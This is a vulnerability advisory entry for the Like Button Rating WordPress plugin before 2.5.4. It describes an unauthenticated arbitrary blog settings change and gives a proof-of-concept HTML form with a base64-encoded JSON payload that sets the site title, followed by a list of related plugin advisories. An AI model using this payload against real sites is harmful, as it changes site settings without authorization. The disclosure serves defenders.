Like Button Rating < 2.5.4 – Unauthenticated Arbitrary Blog Settings Change | Plugin Vulnerabilities

Description

In the init action, this plugin checked to see if $_POST['likebtn_import_config'] is empty. If it’s not empty then it base64-decodes the string, parses it as JSON, and starts changing options. This could allow attackers to change blog settings such as the Site Title.

Proof of Concept

The below form will set the “Site Title” option to “Temmie”:

<form method="POST" action="https://example.com/">
 <input type="text" name="likebtn_import_config" value="ewogICJsaWtlYnRuX3NldHRpbmdzX29wdGlvbnMiOiB7CiAgICAiYmxvZ25hbWUiOiAiVGVtbWllIgogIH0KfQo=">
 <input type="submit">
</form>

Affects Plugins

likebtn-like-button

Fixed in 2.5.4

References

URL

https://advisories.dxw.com/advisories/likebtn-set-any-option/

URL

https://seclists.org/fulldisclosure/2018/Apr/21

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Submitter

Ryan

Submitter twitter

Verified

No

WPVDB ID

37bec1dd-4144-46d0-9395-1932ef2c20c5

Timeline

Publicly Published

2017-11-02 (about 8 years ago)

Added

2018-04-12 (about 8 years ago)

Last Updated

2021-02-06 (about 5 years ago)

Other

Published

Title

Published

2021-08-30

Title

Premium Addons for Elementor < 4.5.2 - Subscriber+ Arbitrary Blog Option Update

Published

2021-03-16

Title

Flo Forms < 1.0.36 - Authenticated Options Change to Stored XSS

Published

2024-01-24

Title

Views for WPForms < 3.2.3 - Cross-Site Request Forgery via create_view

Published

2024-05-21

Title

AI ChatBot < 5.3.6 - Missing Authorization via openai_file_upload_callback

Published

2024-03-04

Title

Password Protected Store for WooCommerce < 2.3 - Unauthenticated Arbitrary Post Tile & Content Access